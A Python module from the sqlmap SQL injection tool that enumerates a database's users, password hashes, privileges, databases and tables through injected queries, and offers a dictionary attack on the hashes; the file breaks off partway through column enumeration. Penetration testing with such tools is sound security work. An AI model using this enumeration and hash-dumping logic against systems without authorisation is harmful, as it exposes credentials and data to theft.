#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

import re
import time

from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import Backend
from lib.core.common import dataToStdout
from lib.core.common import getRange
from lib.core.common import getCompiledRegex
from lib.core.common import getFileItems
from lib.core.common import getUnicode
from lib.core.common import isNoneValue
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import parsePasswordHash
from lib.core.common import parseSqliteTableSchema
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import safeStringFormat
from lib.core.common import safeSQLIdentificatorNaming
from lib.core.common import singleTimeWarnMessage
from lib.core.common import strToHex
from lib.core.common import unArrayizeValue
from lib.core.common import unsafeSQLIdentificatorNaming
from lib.core.convert import safechardecode
from lib.core.convert import utf8decode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.data import queries
from lib.core.dicts import firebirdTypes
from lib.core.dicts import mysqlPrivs
from lib.core.dicts import pgsqlPrivs
from lib.core.dicts import firebirdPrivs
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapConnectionException
from lib.core.exception import sqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapNoneDataException
from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.exception import sqlmapUserQuitException
from lib.core.session import setOs
from lib.core.settings import CONCAT_ROW_DELIMITER
from lib.core.settings import CONCAT_VALUE_DELIMITER
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
from lib.core.settings import MAX_INT
from lib.core.settings import SQL_STATEMENTS
from lib.core.shell import autoCompletion
from lib.core.unescaper import unescaper
from lib.core.threads import getCurrentThreadData
from lib.parse.banner import bannerParser
from lib.request import inject
from lib.request.connect import Connect as Request
from lib.techniques.brute.use import columnExists
from lib.techniques.brute.use import tableExists
from lib.utils.hash import attackDumpedTable
from lib.utils.hash import attackCachedUsersPasswords

class Enumeration:
    """
    This class defines generic enumeration functionalities for plugins.
    """

    def __init__(self):
        kb.data.has_information_schema = False
        kb.data.banner = None
        kb.data.currentUser = ""
        kb.data.currentDb = ""
        kb.data.cachedUsers = []
        kb.data.cachedUsersPasswords = {}
        kb.data.cachedUsersPrivileges = {}
        kb.data.cachedUsersRoles = {}
        kb.data.cachedDbs = []
        kb.data.cachedTables = {}
        kb.data.cachedColumns = {}
        kb.data.cachedCounts = {}
        kb.data.dumpedTable = {}
        kb.data.processChar = None

        self.alwaysRetrieveSqlOutput = False

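    # Fetches the back-end DBMS banner once (cached in kb.data.banner), parses
    # it and, when conf.os is set, registers the underlying operating system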
    def getBanner(self):
        if not conf.getBanner:
            return

        if kb.data.banner is None:
            infoMsg = "fetching banner"
            logger.info(infoMsg)

            query = queries[Backend.getIdentifiedDbms()].banner.query
            kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=False))
            bannerParser(kb.data.banner)

            if conf.os and conf.os == "windows":
                kb.bannerFp["type"] = set([ "Windows" ])

            elif conf.os and conf.os == "linux":
                kb.bannerFp["type"] = set([ "Linux" ])

            elif conf.os:
                kb.bannerFp["type"] = set([ "%s%s" % (conf.os[0].upper(), conf.os[1:]) ])

            if conf.os:
                setOs()

        return kb.data.banner

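    # Retrieves (and caches) the database user the session is running as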
    def getCurrentUser(self):
        infoMsg = "fetching current user"
        logger.info(infoMsg)

        query = queries[Backend.getIdentifiedDbms()].current_user.query

        if not kb.data.currentUser:
            kb.data.currentUser = unArrayizeValue(inject.getValue(query))

        return kb.data.currentUser

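    # Retrieves (and caches) the name of the current database (schema)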
    def getCurrentDb(self):
        infoMsg = "fetching current database"
        logger.info(infoMsg)

        query = queries[Backend.getIdentifiedDbms()].current_db.query

        if not kb.data.currentDb:
            kb.data.currentDb = unArrayizeValue(inject.getValue(query, safeCharEncode=False))

        return kb.data.currentDb

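    # Checks whether the session user (or the optionally given user) has DBA
    # privileges, using a DBMS-specific query wrapped in a CASE statement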
    def isDba(self, user=None):
        infoMsg = "testing if current user is DBA"
        logger.info(infoMsg)

        if Backend.isDbms(DBMS.MYSQL):
            self.getCurrentUser()
            query = queries[Backend.getIdentifiedDbms()].is_dba.query % (kb.data.currentUser.split("@")[0] if kb.data.currentUser else None)
        elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None:
            query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user
        else:
            query = queries[Backend.getIdentifiedDbms()].is_dba.query

        query = agent.forgeCaseStatement(query)
        isDba = inject.getValue(query, charsetType=1)

        if user is None:
            kb.data.isDba = unArrayizeValue(isDba)

        return isDba == "1"

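    # Enumerates database users, inband (UNION/error-based or direct
    # connection) when possible, otherwise one value at a time (blind)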
    def getUsers(self):
        infoMsg = "fetching database users"
        logger.info(infoMsg)

        rootQuery = queries[Backend.getIdentifiedDbms()].users

        condition = ( Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")) )
        condition |= ( Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema )

        if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
            if condition:
                query = rootQuery.inband.query2
            else:
                query = rootQuery.inband.query
            value = inject.getValue(query, blind=False)

            if not isNoneValue(value):
                kb.data.cachedUsers = arrayizeValue(value)

        if not kb.data.cachedUsers and not conf.direct:
            infoMsg = "fetching number of database users"
            logger.info(infoMsg)

            if condition:
                query = rootQuery.blind.count2
            else:
                query = rootQuery.blind.count
            count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)

            if not isNumPosStrValue(count):
                errMsg = "unable to retrieve the number of database users"
                raise sqlmapNoneDataException, errMsg

            if Backend.isDbms(DBMS.ORACLE):
                plusOne = True
            else:
                plusOne = False
            indexRange = getRange(count, plusOne=plusOne)

            for index in indexRange:
                if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB):
                    query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ")
                elif condition:
                    query = rootQuery.blind.query2 % index
                else:
                    query = rootQuery.blind.query % index
                user = inject.getValue(query, inband=False, error=False)

                if user:
                    kb.data.cachedUsers.append(user)

        if not kb.data.cachedUsers:
            errMsg = "unable to retrieve the database users"
            raise sqlmapNoneDataException, errMsg

        return kb.data.cachedUsers

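    # Enumerates users' password hashes and optionally runs a dictionary
    # attack against the retrieved hashes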
    def getPasswordHashes(self):
        infoMsg = "fetching database users password hashes"

        rootQuery = queries[Backend.getIdentifiedDbms()].passwords

        if conf.user == "CU":
            infoMsg += " for current user"
            conf.user = self.getCurrentUser()

        logger.info(infoMsg)

        if conf.user and Backend.isDbms(DBMS.ORACLE):
            conf.user = conf.user.upper()

        if conf.user:
            users = conf.user.split(",")

            if Backend.isDbms(DBMS.MYSQL):
                for user in users:
                    parsedUser = re.search("[\047]*(.*?)[\047]*\@", user)

                    if parsedUser:
                        users[users.index(user)] = parsedUser.groups()[0]
        else:
            users = []

        if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
            if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
                query = rootQuery.inband.query2
            else:
                query = rootQuery.inband.query

            condition = rootQuery.inband.condition

            if conf.user:
                query += " WHERE "
                query += " OR ".join("%s = '%s'" % (condition, user) for user in users)

            if Backend.isDbms(DBMS.SYBASE):
                randStr = randomStr()
                getCurrentThreadData().disableStdOut = True

                retVal = self.__pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr,'%s.password' % randStr], blind=False)

                if retVal:
                    for user, password in zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr]):
                        # password = "0x%s" % strToHex(password)
                        if not kb.data.cachedUsersPasswords.has_key(user):
                            kb.data.cachedUsersPasswords[user] = [password]
                        else:
                            kb.data.cachedUsersPasswords[user].append(password)

                getCurrentThreadData().disableStdOut = False
            else:
                value = inject.getValue(query, blind=False)

                if not isNoneValue(value):
                    for user, password in value:
                        if not user or user == " ":
                            continue

                        password = parsePasswordHash(password)

                        if not kb.data.cachedUsersPasswords.has_key(user):
                            kb.data.cachedUsersPasswords[user] = [password]
                        else:
                            kb.data.cachedUsersPasswords[user].append(password)

        if not kb.data.cachedUsersPasswords and not conf.direct:
            if not len(users):
                users = self.getUsers()

                if Backend.isDbms(DBMS.MYSQL):
                    for user in users:
                        parsedUser = re.search("[\047]*(.*?)[\047]*\@", user)

                        if parsedUser:
                            users[users.index(user)] = parsedUser.groups()[0]

            if Backend.isDbms(DBMS.SYBASE):
                getCurrentThreadData().disableStdOut = True

                randStr = randomStr()
                query = rootQuery.inband.query

                retVal = self.__pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr,'%s.password' % randStr], blind=True)

                if retVal:
                    for user, password in zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr]):
                        password = "0x%s" % strToHex(password)

                        if not kb.data.cachedUsersPasswords.has_key(user):
                            kb.data.cachedUsersPasswords[user] = [password]
                        else:
                            kb.data.cachedUsersPasswords[user].append(password)

                getCurrentThreadData().disableStdOut = False
            else:
                retrievedUsers = set()

                for user in users:
                    if user in retrievedUsers:
                        continue

                    infoMsg = "fetching number of password hashes "
                    infoMsg += "for user '%s'" % user
                    logger.info(infoMsg)

                    if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
                        query = rootQuery.blind.count2 % user
                    else:
                        query = rootQuery.blind.count % user
                    count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)

                    if not isNumPosStrValue(count):
                        warnMsg = "unable to retrieve the number of password "
                        warnMsg += "hashes for user '%s'" % user
                        logger.warn(warnMsg)
                        continue

                    infoMsg = "fetching password hashes for user '%s'" % user
                    logger.info(infoMsg)

                    passwords = []

                    if Backend.isDbms(DBMS.ORACLE):
                        plusOne = True
                    else:
                        plusOne = False
                    indexRange = getRange(count, plusOne=plusOne)

                    for index in indexRange:
                        if Backend.isDbms(DBMS.MSSQL):
                            if Backend.isVersionWithin(("2005", "2008")):
                                query = rootQuery.blind.query2 % (user, index, user)
                            else:
                                query = rootQuery.blind.query % (user, index, user)
                        else:
                            query = rootQuery.blind.query % (user, index)
                        password = inject.getValue(query, inband=False, error=False)
                        password = parsePasswordHash(password)
                        passwords.append(password)

                    if passwords:
                        kb.data.cachedUsersPasswords[user] = passwords
                    else:
                        warnMsg = "unable to retrieve the password "
                        warnMsg += "hashes for user '%s'" % user
                        logger.warn(warnMsg)

                    retrievedUsers.add(user)

        if not kb.data.cachedUsersPasswords:
            errMsg = "unable to retrieve the password hashes for the "
            errMsg += "database users (most probably because the session "
            errMsg += "user has no read privileges over the relevant "
            errMsg += "system database table)"
            raise sqlmapNoneDataException, errMsg

        message = "do you want to use dictionary attack on retrieved password hashes? [Y/n/q]"
        test = readInput(message, default="Y")

        if test[0] in ("n", "N"):
            pass
        elif test[0] in ("q", "Q"):
            raise sqlmapUserQuitException
        else:
            attackCachedUsersPasswords()

        return kb.data.cachedUsersPasswords

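    # Returns True when the given privilege set marks the user as DBA on the
    # identified back-end DBMS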
    def __isAdminFromPrivileges(self, privileges):
        # In PostgreSQL the usesuper privilege means that the
        # user is DBA
        dbaCondition = ( Backend.isDbms(DBMS.PGSQL) and "super" in privileges )

        # In Oracle the DBA privilege means that the
        # user is DBA
        dbaCondition |= ( Backend.isDbms(DBMS.ORACLE) and "DBA" in privileges )

        # In MySQL >= 5.0 the SUPER privilege means
        # that the user is DBA
        dbaCondition |= ( Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema and "SUPER" in privileges )

        # In MySQL < 5.0 the super_priv privilege means
        # that the user is DBA
        dbaCondition |= ( Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema and "super_priv" in privileges )

        # In Firebird there is no specific privilege that means
        # that the user is DBA
        # TODO: confirm
        dbaCondition |= ( Backend.isDbms(DBMS.FIREBIRD) and "SELECT" in privileges and "INSERT" in privileges and "UPDATE" in privileges and "DELETE" in privileges and "REFERENCES" in privileges and "EXECUTE" in privileges )

        return dbaCondition

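    # Enumerates users' privileges and collects which users qualify as
    # administrators according to __isAdminFromPrivileges()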
    def getPrivileges(self, query2=False):
        infoMsg = "fetching database users privileges"

        rootQuery = queries[Backend.getIdentifiedDbms()].privileges

        if conf.user == "CU":
            infoMsg += " for current user"
            conf.user = self.getCurrentUser()

        logger.info(infoMsg)

        if conf.user and Backend.isDbms(DBMS.ORACLE):
            conf.user = conf.user.upper()

        if conf.user:
            users = conf.user.split(",")

            if Backend.isDbms(DBMS.MYSQL):
                for user in users:
                    parsedUser = re.search("[\047]*(.*?)[\047]*\@", user)

                    if parsedUser:
                        users[users.index(user)] = parsedUser.groups()[0]
        else:
            users = []

        # Set containing the list of DBMS administrators
        areAdmins = set()

        if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
            if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
                query = rootQuery.inband.query2
                condition = rootQuery.inband.condition2
            elif Backend.isDbms(DBMS.ORACLE) and query2:
                query = rootQuery.inband.query2
                condition = rootQuery.inband.condition2
            else:
                query = rootQuery.inband.query
                condition = rootQuery.inband.condition

            if conf.user:
                query += " WHERE "

                if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
                    query += " OR ".join("%s LIKE '%%%s%%'" % (condition, user) for user in users)
                else:
                    query += " OR ".join("%s = '%s'" % (condition, user) for user in users)

            values = inject.getValue(query, blind=False)

            if not values and Backend.isDbms(DBMS.ORACLE) and not query2:
                infoMsg = "trying with table USER_SYS_PRIVS"
                logger.info(infoMsg)

                return self.getPrivileges(query2=True)

            if not isNoneValue(values):
                for value in values:
                    user = None
                    privileges = set()

                    for count in xrange(0, len(value)):
                        # The first column is always the username
                        if count == 0:
                            user = value[count]

                        # The other columns are the privileges
                        else:
                            privilege = value[count]

                            # In PostgreSQL we get 1 if the privilege is
                            # True, 0 otherwise
                            if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit():
                                if int(privilege) == 1:
                                    privileges.add(pgsqlPrivs[count])

                            # In MySQL >= 5.0 and Oracle we get the list
                            # of privileges as string
                            elif Backend.isDbms(DBMS.ORACLE) or ( Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema ):
                                privileges.add(privilege)

                            # In MySQL < 5.0 we get Y if the privilege is
                            # True, N otherwise
                            elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
                                if privilege.upper() == "Y":
                                    privileges.add(mysqlPrivs[count])

                    if self.__isAdminFromPrivileges(privileges):
                        areAdmins.add(user)

                    if kb.data.cachedUsersPrivileges.has_key(user):
                        kb.data.cachedUsersPrivileges[user].extend(privileges)
                    else:
                        kb.data.cachedUsersPrivileges[user] = list(privileges)

        if not kb.data.cachedUsersPrivileges and not conf.direct:
            if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
                conditionChar = " LIKE "
            else:
                conditionChar = "="

            if not len(users):
                users = self.getUsers()

                if Backend.isDbms(DBMS.MYSQL):
                    for user in users:
                        parsedUser = re.search("[\047]*(.*?)[\047]*\@", user)

                        if parsedUser:
                            users[users.index(user)] = parsedUser.groups()[0]

            retrievedUsers = set()

            for user in users:
                if user in retrievedUsers:
                    continue

                if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
                    user = "%%%s%%" % user

                infoMsg = "fetching number of privileges "
                infoMsg += "for user '%s'" % user
                logger.info(infoMsg)

                if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
                    query = rootQuery.blind.count2 % user
                elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
                    query = rootQuery.blind.count % (conditionChar, user)
                elif Backend.isDbms(DBMS.ORACLE) and query2:
                    query = rootQuery.blind.count2 % user
                else:
                    query = rootQuery.blind.count % user
                count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)

                if not isNumPosStrValue(count):
                    if not (isinstance(count, basestring) and count.isdigit()) and Backend.isDbms(DBMS.ORACLE) and not query2:
                        infoMsg = "trying with table USER_SYS_PRIVS"
                        logger.info(infoMsg)

                        return self.getPrivileges(query2=True)

                    warnMsg = "unable to retrieve the number of "
                    warnMsg += "privileges for user '%s'" % user
                    logger.warn(warnMsg)
                    continue

                infoMsg = "fetching privileges for user '%s'" % user
                logger.info(infoMsg)

                privileges = set()

                if Backend.isDbms(DBMS.ORACLE):
                    plusOne = True
                else:
                    plusOne = False
                indexRange = getRange(count, plusOne=plusOne)

                for index in indexRange:
                    if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
                        query = rootQuery.blind.query2 % (user, index)
                    elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
                        query = rootQuery.blind.query % (conditionChar, user, index)
                    elif Backend.isDbms(DBMS.ORACLE) and query2:
                        query = rootQuery.blind.query2 % (user, index)
                    elif Backend.isDbms(DBMS.FIREBIRD):
                        query = rootQuery.blind.query % (index, user)
                    else:
                        query = rootQuery.blind.query % (user, index)
                    privilege = inject.getValue(query, inband=False, error=False)

                    # In PostgreSQL we get 1 if the privilege is True,
                    # 0 otherwise
                    if Backend.isDbms(DBMS.PGSQL) and ", " in privilege:
                        privilege = privilege.replace(", ", ",")
                        privs = privilege.split(",")
                        i = 1

                        for priv in privs:
                            if priv.isdigit() and int(priv) == 1:
                                for position, pgsqlPriv in pgsqlPrivs.items():
                                    if position == i:
                                        privileges.add(pgsqlPriv)

                            i += 1

                    # In MySQL >= 5.0 and Oracle we get the list
                    # of privileges as string
                    elif Backend.isDbms(DBMS.ORACLE) or ( Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema ):
                        privileges.add(privilege)

                    # In MySQL < 5.0 we get Y if the privilege is
                    # True, N otherwise
                    elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
                        privilege = privilege.replace(", ", ",")
                        privs = privilege.split(",")
                        i = 1

                        for priv in privs:
                            if priv.upper() == "Y":
                                for position, mysqlPriv in mysqlPrivs.items():
                                    if position == i:
                                        privileges.add(mysqlPriv)

                            i += 1

                    # In Firebird we get one letter for each privilege
                    elif Backend.isDbms(DBMS.FIREBIRD):
                        privileges.add(firebirdPrivs[privilege.strip()])

                    if self.__isAdminFromPrivileges(privileges):
                        areAdmins.add(user)

                    # In MySQL < 5.0 we break the cycle after the first
                    # time we get the user's privileges otherwise we
                    # duplicate the same query
                    if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
                        break

                if privileges:
                    kb.data.cachedUsersPrivileges[user] = list(privileges)
                else:
                    warnMsg = "unable to retrieve the privileges "
                    warnMsg += "for user '%s'" % user
                    logger.warn(warnMsg)

                retrievedUsers.add(user)

        if not kb.data.cachedUsersPrivileges:
            errMsg = "unable to retrieve the privileges "
            errMsg += "for the database users"
            raise sqlmapNoneDataException, errMsg

        return ( kb.data.cachedUsersPrivileges, areAdmins )

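    # Falls back to privilege enumeration on DBMSes without a role concept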
    def getRoles(self, query2=False):
        warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms()
        warnMsg += "exist. sqlmap will enumerate privileges instead"
        logger.warn(warnMsg)

        return self.getPrivileges(query2)

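    # Enumerates available database (schema) names, falling back to the
    # current database when nothing else can be retrieved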
    def getDbs(self):
        if len(kb.data.cachedDbs) > 0:
            return kb.data.cachedDbs

        if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
            warnMsg = "information_schema not available, "
            warnMsg += "back-end DBMS is MySQL < 5. database "
            warnMsg += "names will be fetched from 'mysql' database"
            logger.warn(warnMsg)

        if Backend.isDbms(DBMS.ORACLE):
            warnMsg = "schema names are going to be used on Oracle "
            warnMsg += "for enumeration as the counterpart to database "
            warnMsg += "names on other DBMSes"
            logger.warn(warnMsg)

            infoMsg = "fetching database (schema) names"
        else:
            infoMsg = "fetching database names"

        logger.info(infoMsg)

        rootQuery = queries[Backend.getIdentifiedDbms()].dbs

        if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
            if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
                query = rootQuery.inband.query2
            else:
                query = rootQuery.inband.query
            value = inject.getValue(query, blind=False)

            if not isNoneValue(value):
                kb.data.cachedDbs = arrayizeValue(value)

        if not kb.data.cachedDbs and not conf.direct:
            infoMsg = "fetching number of databases"
            logger.info(infoMsg)

            if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
                query = rootQuery.blind.count2
            else:
                query = rootQuery.blind.count
            count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)

            if not isNumPosStrValue(count):
                errMsg = "unable to retrieve the number of databases"
                logger.error(errMsg)
            else:
                if Backend.isDbms(DBMS.ORACLE):
                    plusOne = True
                else:
                    plusOne = False
                indexRange = getRange(count, plusOne=plusOne)

                for index in indexRange:
                    if Backend.isDbms(DBMS.SYBASE):
                        query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ")
                    elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
                        query = rootQuery.blind.query2 % index
                    else:
                        query = rootQuery.blind.query % index
                    db = inject.getValue(query, inband=False, error=False)

                    if db:
                        kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db))

        if not kb.data.cachedDbs:
            infoMsg = "falling back to current database"
            logger.info(infoMsg)
            self.getCurrentDb()

            if kb.data.currentDb:
                kb.data.cachedDbs = [kb.data.currentDb]
            else:
                errMsg = "unable to retrieve the database names"
                raise sqlmapNoneDataException, errMsg

        return kb.data.cachedDbs

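    # Enumerates table names for the requested (or all) databases, optionally
    # resorting to common table existence brute force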
    def getTables(self, bruteForce=None):
        if len(kb.data.cachedTables) > 0:
            return kb.data.cachedTables

        self.forceDbmsEnum()

        if bruteForce is None:
            if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
                errMsg = "information_schema not available, "
                errMsg += "back-end DBMS is MySQL < 5.0"
                logger.error(errMsg)
                bruteForce = True

            elif Backend.isDbms(DBMS.ACCESS):
                try:
                    tables = self.getTables(False)
                except sqlmapNoneDataException:
                    tables = None

                if not tables:
                    errMsg = "cannot retrieve table names, "
                    errMsg += "back-end DBMS is Access"
                    logger.error(errMsg)
                    bruteForce = True
                else:
                    return tables

        if conf.db == "CD":
            conf.db = self.getCurrentDb()

        if conf.db and Backend.isDbms(DBMS.ORACLE):
            conf.db = conf.db.upper()

        if conf.db:
            dbs = conf.db.split(",")
        else:
            dbs = self.getDbs()

        for db in dbs:
            dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)

        if bruteForce:
            resumeAvailable = False

            for db, table in kb.brute.tables:
                if db == conf.db:
                    resumeAvailable = True
                    break

            if resumeAvailable:
                for db, table in kb.brute.tables:
                    if db == conf.db:
                        if not kb.data.cachedTables.has_key(conf.db):
                            kb.data.cachedTables[conf.db] = [table]
                        else:
                            kb.data.cachedTables[conf.db].append(table)

                return kb.data.cachedTables

            message = "do you want to use common table existence check? [Y/n/q]"
            test = readInput(message, default="Y")

            if test[0] in ("n", "N"):
                return
            elif test[0] in ("q", "Q"):
                raise sqlmapUserQuitException
            else:
                return tableExists(paths.COMMON_TABLES)

        infoMsg = "fetching tables for database"
        infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db for db in dbs))
        logger.info(infoMsg)

        rootQuery = queries[Backend.getIdentifiedDbms()].tables

        if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
            query = rootQuery.inband.query
            condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None

            if condition:
                if conf.excludeSysDbs:
                    query += " WHERE "
                    query += " AND ".join("%s != '%s'" % (condition, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList)
                    infoMsg = "skipping system database%s: %s" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList))
                    logger.info(infoMsg)
                elif not Backend.isDbms(DBMS.SQLITE):
                    query += " WHERE "
                    query += " OR ".join("%s = '%s'" % (condition, unsafeSQLIdentificatorNaming(db)) for db in dbs)

            if Backend.isDbms(DBMS.MSSQL):
                query = safeStringFormat(query, conf.db)

            value = inject.getValue(query, blind=False)
            value = filter(lambda x: x, value)

            if not isNoneValue(value):
                if Backend.isDbms(DBMS.SQLITE):
                    if isinstance(value, basestring):
                        value = [[ DBMS.SQLITE, value ]]
                    elif isinstance(value, (list, tuple, set)):
                        newValue = []

                        for v in value:
                            newValue.append([ DBMS.SQLITE, v])

                        value = newValue

                for db, table in value:
                    db = safeSQLIdentificatorNaming(db)
                    table = safeSQLIdentificatorNaming(table, True)

                    if not kb.data.cachedTables.has_key(db):
                        kb.data.cachedTables[db] = [table]
                    else:
                        kb.data.cachedTables[db].append(table)

        if not kb.data.cachedTables and not conf.direct:
            for db in dbs:
                if conf.excludeSysDbs and db in self.excludeDbsList:
                    infoMsg = "skipping system database '%s'" % db
                    logger.info(infoMsg)

                    continue

                infoMsg = "fetching number of tables for "
                infoMsg += "database '%s'" % db
                logger.info(infoMsg)

                if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS):
                    query = rootQuery.blind.count
                else:
                    query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db)
                count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)

                if not isNumPosStrValue(count):
                    warnMsg = "unable to retrieve the number of "
                    warnMsg += "tables for database '%s'" % db
                    logger.warn(warnMsg)
                    continue

                tables = []

                if Backend.isDbms(DBMS.ORACLE):
                    plusOne = True
                else:
                    plusOne = False
                indexRange = getRange(count, plusOne=plusOne)

                for index in indexRange:
                    if Backend.isDbms(DBMS.SYBASE):
                        query = rootQuery.blind.query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " "))
                    elif Backend.getIdentifiedDbms() in (DBMS.MAXDB, DBMS.ACCESS):
                        query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")
                    elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
                        query = rootQuery.blind.query % index
                    else:
                        query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index)

                    table = inject.getValue(query, inband=False, error=False)
                    kb.hintValue = table
                    table = safeSQLIdentificatorNaming(table, True)
                    tables.append(table)

                if tables:
                    kb.data.cachedTables[db] = tables
                else:
                    warnMsg = "unable to retrieve the table names "
                    warnMsg += "for database '%s'" % db
                    logger.warn(warnMsg)

        if isNoneValue(kb.data.cachedTables):
            kb.data.cachedTables.clear()

        if not kb.data.cachedTables:
            errMsg = "unable to retrieve the table names for any database"

            if bruteForce is None:
                logger.error(errMsg)
                return self.getTables(bruteForce=True)
            else:
                raise sqlmapNoneDataException, errMsg

        return kb.data.cachedTables

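    # Enumerates columns (and their types) for the requested table(s),
    # optionally resorting to common column existence brute force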
    def getColumns(self, onlyColNames=False):
        self.forceDbmsEnum()

        if conf.db is None or conf.db == "CD":
            if conf.db is None:
                warnMsg = "missing database parameter, sqlmap is going "
                warnMsg += "to use the current database to enumerate "
                warnMsg += "table(s) columns"
                logger.warn(warnMsg)

            conf.db = self.getCurrentDb()

        elif conf.db is not None:
            if Backend.isDbms(DBMS.ORACLE):
                conf.db = conf.db.upper()

            if ',' in conf.db:
                errMsg = "only one database name is allowed when enumerating "
                errMsg += "the tables' columns"
                raise sqlmapMissingMandatoryOptionException, errMsg

        conf.db = safeSQLIdentificatorNaming(conf.db)

        if conf.col:
            if Backend.isDbms(DBMS.ORACLE):
                conf.col = conf.col.upper()

            colList = conf.col.split(",")
        else:
            colList = []

        for col in colList:
            colList[colList.index(col)] = safeSQLIdentificatorNaming(col)

        if conf.tbl:
            if Backend.isDbms(DBMS.ORACLE):
                conf.tbl = conf.tbl.upper()

            tblList = conf.tbl.split(",")
        else:
            self.getTables()

            if len(kb.data.cachedTables) > 0:
                tblList = kb.data.cachedTables.values()

                if isinstance(tblList[0], (set, tuple, list)):
                    tblList = tblList[0]
            else:
                errMsg = "unable to retrieve the tables "
                errMsg += "on database '%s'" % conf.db
                raise sqlmapNoneDataException, errMsg

        for tbl in tblList:
            tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)

        bruteForce = False

        if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
            errMsg = "information_schema not available, "
            errMsg += "back-end DBMS is MySQL < 5.0"
            logger.error(errMsg)
            bruteForce = True

        elif Backend.isDbms(DBMS.ACCESS):
            errMsg = "cannot retrieve column names, "
            errMsg += "back-end DBMS is Access"
            logger.error(errMsg)
            bruteForce = True

        if bruteForce:
            resumeAvailable = False

            for tbl in tblList:
                for db, table, colName, colType in kb.brute.columns:
                    if db == conf.db and table == tbl:
                        resumeAvailable = True
                        break

            if resumeAvailable or colList:
                columns = {}

                for column in colList:
                    columns[column] = None

                for tbl in tblList:
                    for db, table, colName, colType in kb.brute.columns:
                        if db == conf.db and table == tbl:
                            columns[colName] = colType

                    if conf.db in kb.data.cachedColumns:
